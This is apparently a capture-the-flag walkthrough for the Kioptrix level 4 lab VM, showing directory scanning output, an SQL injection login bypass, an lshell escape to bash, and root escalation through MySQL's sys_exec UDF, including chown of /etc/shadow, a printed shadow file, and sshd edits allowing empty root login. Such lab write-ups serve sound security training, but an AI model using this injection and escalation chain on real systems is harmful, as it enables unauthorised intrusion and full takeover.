—- Scanning URL: http://192.168.117.132/ —-
+ http://192.168.117.132/cgi-bin/ (CODE:403|SIZE:330)
==> DIRECTORY: http://192.168.117.132/images/
+ http://192.168.117.132/index (CODE:200|SIZE:1255)
+ http://192.168.117.132/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.117.132/john/
+ http://192.168.117.132/logout (CODE:302|SIZE:0)
+ http://192.168.117.132/member (CODE:302|SIZE:220)
+ http://192.168.117.132/server-status (CODE:403|SIZE:335)

—- Entering directory: http://192.168.117.132/images/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://192.168.117.132/john/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

Run GoBuster
> gobuster -u ‘http://192.168.117.132&#8217; -w /usr/share/wordlists/dirb/big.txt

Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.117.132/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/images (Status: 301)
/index (Status: 200)
/john (Status: 301)
/logout (Status: 302)
/member (Status: 302)
/robert (Status: 301)

Visit the webpage hosted on target machine

lvl-4-001

lvl-4-002

lvl-4-003

lvl-4-004

lvl-4-005

lvl-4-006

Perform SQL Injection

Back to the login back, let’s try to log in as john or Robert

lvl-4-007

Simply enter the following into the login field
> username: john
> password: ‘ or 1=1 — 

lvl-4-008

Do the same using username “robert” and you will have the following 2 credentials for login,

  • john / MyNameIsJohn
  • robert / ADGAdsafdfwt4gadfga==

Login via SSH
> ssh john@192.168.117.132

lvl-4-009

> ssh john@192.168.117.132

lvl-4-010

Both users are using lshell, which is a limited shell based on Python.

After some research, seems like it is possible to escape from this shell by using the echo command to call os.system

> echo os.system(‘/bin/bash’)
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> ls -la /home/loneferret

total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw——- 1 loneferret loneferret 62 2012-02-06 20:24 .bash_history
-rw-r–r– 1 loneferret loneferret 220 2012-02-04 09:58 .bash_logout
-rw-r–r– 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r–r– 1 loneferret loneferret 1 2012-02-05 10:37 .lhistory
-rw——- 1 root root 68 2012-02-04 10:05 .my.cnf.5086
-rw——- 1 root root 1 2012-02-04 10:05 .mysql.5086
-rw——- 1 loneferret loneferret 1 2012-02-05 10:38 .mysql_history
-rw——- 1 loneferret loneferret 9 2012-02-06 16:39 .nano_history
-rw-r–r– 1 loneferret loneferret 586 2012-02-04 09:58 .profile
-rw-r–r– 1 loneferret loneferret 0 2012-02-04 10:01 .sudo_as_admin_successful

Check MySQL is being run by which user
> ps -ef | grep mysql

root 4892 1 0 Oct29 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
root 4934 4892 0 Oct29 ? 00:00:04 /usr/sbin/mysqld –basedir=/usr
root 4935 4892 0 Oct29 ? 00:00:00 logger -p daemon.err -t mysqld_s
john 6119 6071 0 00:57 pts/0 00:00:00 grep mysql

Good news, seems like MySQL is running as root. Let’s see if its login credentials are hard-coded in the HTTP server configuration file
> ls /var/www

checklogin.php images john logout.php robert
database.sql index.php login_success.php member.php

> cat /var/www/checklogin.php

[ … omitted … ]
$host=”localhost”; // Host name
$username=”root”; // Mysql username
$password=””; // Mysql password
$db_name=”members”; // Database name
$tbl_name=”members”; // Table name
[ … omitted … ]

Login to MySQL as user root
> mysql -u root -h localhost

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 854
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.

After some research, seems like we can perform privilege escalation from a MySQL server running as root.

In essence, since we are able to access MySQL server as root, we can utilize this permission level to run something called User Defined Functions (UDF) to perform privilege escalation.

To do so, we need to download the lib_mysqludf_sys.so library, which will allow us to perform commands that can achieved our goal.

The following are its most commonly used functions,

  • sys_eval (executes an arbitrary command, and returns its output)
  • sys_exec (executes an arbitrary command, and returns it’s exit code)

However, the good news is that there is no need to download them in this case because they already exists in the VM. Thanks the creator!
> whereis lib_mysqludf_sys.so

/usr/lib/lib_mysqludf_sys.so

mysql> SELECT sys_exec(‘chown john.john /etc/shadow’);

+—————————————–+
| sys_exec(‘chown john.john /etc/shadow’) |
+—————————————–+
| NULL |
+—————————————–+
1 row in set (0.00 sec)

mysql> SELECT sys_exec(‘chown john.john /etc/passwd’);

+—————————————–+
| sys_exec(‘chown john.john /etc/passwd’) |
+—————————————–+
| NULL |
+—————————————–+
1 row in set (0.00 sec)

mysql> SELECT sys_exec(‘chown -R john.john /root’);

+————————————–+
| sys_exec(‘chown -R john.john /root’) |
+————————————–+
| NULL |
+————————————–+
1 row in set (0.01 sec)

> cat /root/congrats.txt

Congratulations!

You’ve got root.

There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven’t already, check out the other VMs available on:
http://www.kioptrix.com

Thanks for playing,
Loneferret

No, not yet. We are not root yet, only managed to read the files of root.
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> cat /etc/shadow

root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::
daemon:*:15374:0:99999:7:::
bin:*:15374:0:99999:7:::
sys:*:15374:0:99999:7:::
sync:*:15374:0:99999:7:::
games:*:15374:0:99999:7:::
man:*:15374:0:99999:7:::
lp:*:15374:0:99999:7:::
mail:*:15374:0:99999:7:::
news:*:15374:0:99999:7:::
uucp:*:15374:0:99999:7:::
proxy:*:15374:0:99999:7:::
www-data:*:15374:0:99999:7:::
backup:*:15374:0:99999:7:::
list:*:15374:0:99999:7:::
irc:*:15374:0:99999:7:::
gnats:*:15374:0:99999:7:::
nobody:*:15374:0:99999:7:::
libuuid:!:15374:0:99999:7:::
dhcp:*:15374:0:99999:7:::
syslog:*:15374:0:99999:7:::
klog:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
sshd:*:15374:0:99999:7:::
loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::

Now, modify the /etc/passwd file and remove the ‘x’ as highlighted in red below

root:x:0:0:root:/root:/bin/bash

Modify the /etc/shadow file and remove the chars as highlighted in red below

root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::

Back to MySQL again, we will change the owner of ssh config files to john

mysql> SELECT sys_exec(‘chown -R john.john /etc/ssh’);

+—————————————–+
| sys_exec(‘chown -R john.john /etc/ssh’) |
+—————————————–+
| NULL |
+—————————————–+
1 row in set (0.00 sec)

Modify the /etc/ssh/sshd_config file and identify the following line as highlighted in red. Change it to yes.

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

And also find the following line, as highlighted in red. It should be at the very last line. Change it to no.

UsePAM yes

We are done with the edits. Save the file now and reboot the system for the changes to take effect.

> mysql> SELECT sys_exec(‘reboot’);
> ssh root@192.168.117.132
>id

uid=0(root) gid=0(root) groups=0(root)

Congrats, you are now logged in as root!

I came across an even faster way to get root.

Simply login to MySQL and run the following command to add robert into the admin group, so that he is able to perform sudo as an administrator.
> select sys_exec(‘usermod -a -G admin robert’);

+—————————————-+
| sys_exec(‘usermod -a -G admin robert’) |
+—————————————-+
| NULL |
+—————————————-+
1 row in set (0.03 sec)

Now, perform the sudo su command using robert account.

robert@Kioptrix4:~$ sudo su
[sudo] password for robert:
root@Kioptrix4:/home/robert# whoami
root

There you go, root!